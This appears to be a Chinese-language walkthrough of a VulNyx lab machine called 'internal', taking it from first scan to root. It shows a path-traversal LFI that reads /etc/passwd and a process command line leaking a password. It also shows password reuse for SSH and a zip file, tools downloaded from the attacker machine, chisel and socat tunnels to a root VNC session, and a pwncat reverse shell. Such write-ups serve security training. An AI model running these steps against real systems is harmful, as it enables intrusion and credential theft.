信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.221  08:00:27:8a:8c:19       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.038 seconds (125.61 hosts/sec). 4 responded
❯ export ip=192.168.60.221
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.221:22
Open 192.168.60.221:80
Open 192.168.60.221:9999
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-03 08:51 CST
Initiating ARP Ping Scan at 08:51
Scanning 192.168.60.221 [1 port]
Completed ARP Ping Scan at 08:51, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:51
Completed Parallel DNS resolution of 1 host. at 08:51, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:51
Scanning 192.168.60.221 [3 ports]
Discovered open port 80/tcp on 192.168.60.221
Discovered open port 9999/tcp on 192.168.60.221
Discovered open port 22/tcp on 192.168.60.221
Completed SYN Stealth Scan at 08:51, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.221
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-03-03 08:51:13 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
9999/tcp open  abyss   syn-ack ttl 64
MAC Address: 08:00:27:8A:8C:19 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

扫一下目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.221
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 30845]
/assets               (Status: 301) [Size: 317] [--> http://192.168.60.221/assets/]
/forms                (Status: 301) [Size: 316] [--> http://192.168.60.221/forms/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

浏览器访问一下80端口，并没有找到什么有价值的信息

我尝试利用concact测试有没有xss漏洞，结果没办法发送

LFI文件包含

不过在源代码中发现了有个链接含有参数internal-item.php?item=index.html#hero

竟然藏在logo字母中

点进去会跳转到index.html，不过前面有参数item

猜测含有LFI漏洞

❯ wfuzz -c -u "http://192.168.60.221/internal-item.php?item=FUZZ" -w ../thl/file_inclusion_linux.txt --hw 2
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.221/internal-item.php?item=FUZZ
Total requests: 2299

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000031:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        ....//....//etc/passwd"
000000041:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//etc/passwd"
000000042:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//etc/passwd"
000000035:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
000000028:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        ....//....//....//....//....//etc/passwd"
000000029:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        ....//....//....//....//etc/passwd"
000000032:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        ....//etc/passwd"
000000030:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        ....//....//....//etc/passwd"
000000037:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//etc/passwd"
000000043:   200        28 L     40 W       1404 Ch     "....//....//....//....//etc/passwd"
000000036:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
000000038:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//etc/passwd"
000000040:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//etc/passwd"
000000044:   200        28 L     40 W       1404 Ch     "....//....//....//etc/passwd"
000000039:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//etc/passwd"
000000034:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//etc/pa
                                                        sswd"
000000027:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        ....//....//....//....//....//....//etc/passwd"
000000025:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        ....//....//....//....//....//....//....//....//etc/passwd"
000000033:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        etc/passwd"
000000026:   200        28 L     40 W       1404 Ch     "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
                                                        ....//....//....//....//....//....//....//etc/passwd"

Total time: 1.729885
Processed Requests: 2299
Filtered Requests: 2279
Requests/sec.: 1328.989

curl下来看一下有什么用户

得到admin用户

❯ curl "http://192.168.60.221/internal-item.php?item=....//....//....//....//etc/passwd" |grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1404  100  1404    0     0   599k      0 --:--:-- --:--:-- --:--:--  685k
root:x:0:0:root:/root:/bin/bash
admin:x:1000:1000:admin,,,:/home/admin:/bin/bash

此外在9999端口上，需要进行authorization Basic认证登录

模糊测试

尝试利用此用户名爆破，无果

但是我们可以通过LFI来读取/proc下的文件

在 Linux 系统中，/proc 文件夹（也称为“proc 文件系统”）是一个虚拟文件系统，提供了有关系统和运行中的进程的信息。这个文件夹是由内核动态生成的，包含一系列文件和子目录，用于显示系统内核、硬件设备和进程的实时信息。以下是一些重要的内容：

进程子目录：/proc 文件夹中的每个子目录都是一个运行中的进程，命名为该进程的 PID（进程 ID）。例如，目录 /proc/1234 包含 PID 为 1234 的进程的信息。

cmdline 文件：包含启动进程时的命令行参数。

status 文件：提供进程的状态信息，例如内存使用、进程优先级等。

cpuinfo 文件：包含有关 CPU 的详细信息。

meminfo 文件：提供有关系统内存使用情况的信息。

通过枚举pid来看一下进程启动时的命令行参数cmdline

利用wfuzz枚举一下，筛选含有admin的

❯ wfuzz -c -z range,1-1000 -u "http://192.168.60.221/internal-item.php?item=....//....//....//....//proc/FUZZ/cmdline" --ss 'admin'
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.221/internal-item.php?item=....//....//....//....//proc/FUZZ/cmdline
Total requests: 1000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000346:   200        2 L      2 W        100 Ch      "346"

Total time: 0
Processed Requests: 1000
Filtered Requests: 999
Requests/sec.: 0

发现pid为346存在参数，curl一下

1
2
3

❯ curl "http://192.168.60.221/internal-item.php?item=....//....//....//....//proc/346/cmdline" --output -
<pre>
python3/home/admin/python3HTTPSAuthServer.py--port9999--authadmin:4dM1Nt3rN4LP4zZ</pre>

得到凭证admin:4dM1Nt3rN4LP4zZ

我尝试利用此凭证登录9999端口

结果没啥信息，猜测会使用相同密码，撞库一下

用户提权

尝试连接ssh，连接成功

❯ ssh admin@$ip
[email protected]'s password:
Linux internal 5.10.0-22-amd64 #1 SMP Debian 5.10.178-3 (2023-04-22) x86_64
Last login: Mon May  8 17:18:54 2023 from 192.168.1.10
admin@internal:~$ cat user.txt
22c15f8a6b80b178f36f3fcf5053bd82

VNC端口开放

查看本地开放端口，发现存在5901端口开放，这不是vnc吗

admin@internal:/tmp$ ss -luntp
Netid       State        Recv-Q       Send-Q             Local Address:Port             Peer Address:Port      Process
udp         UNCONN       0            0                        0.0.0.0:68                    0.0.0.0:*
tcp         LISTEN       0            128                      0.0.0.0:22                    0.0.0.0:*
tcp         LISTEN       0            5                      127.0.0.1:5901                  0.0.0.0:*
tcp         LISTEN       0            5                        0.0.0.0:9999                  0.0.0.0:*          users:(("python3",pid=346,fd=3))
tcp         LISTEN       0            128                         [::]:22                       [::]:*
tcp         LISTEN       0            5                          [::1]:5901                     [::]:*
tcp         LISTEN       0            511                            *:80                          *:*

同时利用linpeas.sh扫到了tiger vnc的相关文件

╔══════════╣ Analyzing VNC Files (limit 70)

-rw-r--r-- 1 root root 4789 ene 26  2022 /usr/share/man/man5/tigervnc.conf.5x.gz
-rw-r--r-- 1 root root 162 ene 26  2022 /var/lib/dpkg/info/tigervnc-common.conffiles
/etc/pam.d/tigervnc
/etc/tigervnc/openssl-ecparams.pem
/etc/tigervnc/openssl.cnf
/etc/tigervnc/vncserver-config-defaults
/etc/tigervnc/vncserver-config-mandatory
-rw-r--r-- 1 root root 57 ene 26  2022 /var/lib/dpkg/info/tigervnc-standalone-server.conffiles
/etc/X11/Xtigervnc-session
/etc/tigervnc/vncserver.users

利用pspy64可以看到root用户运行着tigervnc并且密码保存在/root/.vnc/passwd中

1
2
3

2025/03/03 03:10:25 CMD: UID=0     PID=456    | /usr/bin/Xtigervnc :1 -rfbport 5901 -localhost=1 -SecurityTypes VncAuth -PasswordFile /root/.vnc/passwd -ClientWaitTimeMillis 30000 -geometry 1920x1200 -desktop internal:1 (root) -depth 24 -auth /root/.Xauthority
2025/03/03 03:10:25 CMD: UID=0     PID=454    | /usr/bin/perl /usr/bin/tigervncserver -xstartup /usr/bin/xterm

发现用户admin家目录中存在隐藏文件

admin@internal:~$ ls -al
total 44
drwx------ 4 admin admin 4096 may  8  2023 .
drwxr-xr-x 3 root  root  4096 may  8  2023 ..
drwx------ 2 admin admin 4096 may  8  2023 ...
lrwxrwxrwx 1 root  root     9 abr 23  2023 .bash_history -> /dev/null
-rw------- 1 admin admin  220 ene 15  2023 .bash_logout
-rw------- 1 admin admin 3526 ene 15  2023 .bashrc
drwxr-xr-x 3 admin admin 4096 may  8  2023 .local
-rw------- 1 admin admin  807 ene 15  2023 .profile
-rwx------ 1 admin admin 5504 may  8  2023 python3HTTPSAuthServer.py
-rw-r--r-- 1 admin admin   66 may  8  2023 .selected_editor
-r-------- 1 admin admin   33 may  8  2023 user.txt
admin@internal:~$ cd ...
admin@internal:~/...$ ls -al
total 12
drwx------ 2 admin admin 4096 may  8  2023 .
drwx------ 4 admin admin 4096 may  8  2023 ..
-rw-r--r-- 1 admin admin  198 may  8  2023 internalkey.zip

传到本地，需要密码，尝试利用john爆破一下

❯ scp admin@$ip:~/.../internalkey.zip .
[email protected]'s password:
internalkey.zip                          100%  198   257.3KB/s   00:00
❯ x internalkey.zip
extract: extracting to internalkey
Archive:  /home/Pepster/vulnyx/internalkey.zip
[/home/Pepster/vulnyx/internalkey.zip] passwd password: %
❯ zip2john internalkey.zip >hash
ver 1.0 efh 5455 efh 7875 internalkey.zip/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=20, decmplen=8, crc=16FA5922 ts=8B17 cs=8b17 type=0
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2025-03-03 10:16) 0g/s 14488Kp/s 14488Kc/s 14488KC/s "2parrow"..*7¡Vamos!
Session completed.

无果，爆不出来，尝试利用hashcat也出不来

猜测使用ssh的相同密码，结果还真是

admin@internal:~/...$ unzip internalkey.zip
Archive:  internalkey.zip
[internalkey.zip] passwd password:
 extracting: passwd
admin@internal:~/...$ cat passwd
x
4Mw

Root提权

猜测这是vnc连接的密码备份

端口转发

利用socat将本地端口开放映射出来

admin@internal:/tmp$ wget 192.168.60.100/socat
--2025-03-03 03:40:11--  http://192.168.60.100/socat
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 375176 (366K) [application/octet-stream]
Grabando a: «socat»

socat                                 100%[=======================================================================>] 366,38K  --.-KB/s    en 0,006s

2025-03-03 03:40:11 (64,8 MB/s) - «socat» guardado [375176/375176]

admin@internal:/tmp$ chmod +x socat
admin@internal:/tmp$ ./socat TCP-LISTEN:5602,fork TCP4:127.0.0.1:5601&
[1] 13598

结果socat有问题了，连接被拒绝

❯ vncviewer -passwd passwd $ip:5602
vncviewer: VNC server closed connection
------------------------------
admin@internal:~/...$ 2025/03/03 03:45:38 socat[13637] E connect(5, AF=2 127.0.0.1:5601, 16): Connection refused
2025/03/03 03:45:41 socat[13638] E connect(5, AF=2 127.0.0.1:5601, 16): Connection refused
2025/03/03 03:45:58 socat[13639] E connect(5, AF=2 127.0.0.1:5601, 16): Connection refused

尝试利用chisel来进行端口转发到kali上

admin@internal:/tmp$ wget 192.168.60.100/chisel
--2025-03-03 03:48:00--  http://192.168.60.100/chisel
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 9371800 (8,9M) [application/octet-stream]
Grabando a: «chisel»

chisel                                100%[=======================================================================>]   8,94M  --.-KB/s    en 0,06s  

2025-03-03 03:48:00 (142 MB/s) - «chisel» guardado [9371800/9371800]

admin@internal:/tmp$ chmod +x chisel
admin@internal:/tmp$ ./chisel client 192.168.60.100:1111 R:5601:127.0.0.1:5601&
[1] 13653
admin@internal:/tmp$ 2025/03/03 03:50:16 client: Connecting to ws://192.168.60.100:1111
2025/03/03 03:50:16 client: Connected (Latency 1.319439ms)
------------------------------------------------
❯ chisel server --reverse -p 1111 --reverse
2025/03/03 10:49:37 server: Reverse tunnelling enabled
2025/03/03 10:49:37 server: Fingerprint UMeZCGj/6A65jgTUtq89qTSKk0HrAr6y6qd+o48oz2w=
2025/03/03 10:49:37 server: Listening on http://0.0.0.0:1111
2025/03/03 10:50:15 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2025/03/03 10:50:15 server: session#1: tun: proxy#R:5601=>5601: Listening

泥马，我发现我铸币了，端口打错了，不是5601是5901

admin@internal:/tmp$ kill -9 13653
admin@internal:/tmp$ ./chisel client 192.168.60.100:1111 R:5901:127.0.0.1:5901&
[2] 13661
[1]   Terminado (killed)      ./chisel client 192.168.60.100:1111 R:5601:127.0.0.1:5601
admin@internal:/tmp$ 2025/03/03 03:52:35 client: Connecting to ws://192.168.60.100:1111
2025/03/03 03:52:35 client: Connected (Latency 1.419383ms)

vnc本地连接端口5901

❯ vncviewer -passwd passwd 127.0.0.1:5901
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "internal:1 (root)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

弹个shell过来

❯ pwncat-cs -lp 4444
[10:54:36] Welcome to pwncat 🐈!                           __main__.py:164
[10:55:08] received connection from 192.168.60.221:38044        bind.py:84
[10:55:08] 0.0.0.0:4444: normalizing shell path             manager.py:957
[10:55:09] 192.168.60.221:38044: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) root@internal:/root# id
uid=0(root) gid=0(root) grupos=0(root)
(remote) root@internal:/root# cat /root/root.txt
94f50378a53c0c1eb0899494e352766b

事实证明socat没问题，我端口打错了而已，也能连接

admin@internal:/tmp$ ./socat TCP-LISTEN:5902,fork TCP4:127.0.0.1:5901&
[1] 13728 
----------------------------------------
❯ vncviewer -passwd passwd $ip:5902
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "internal:1 (root)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0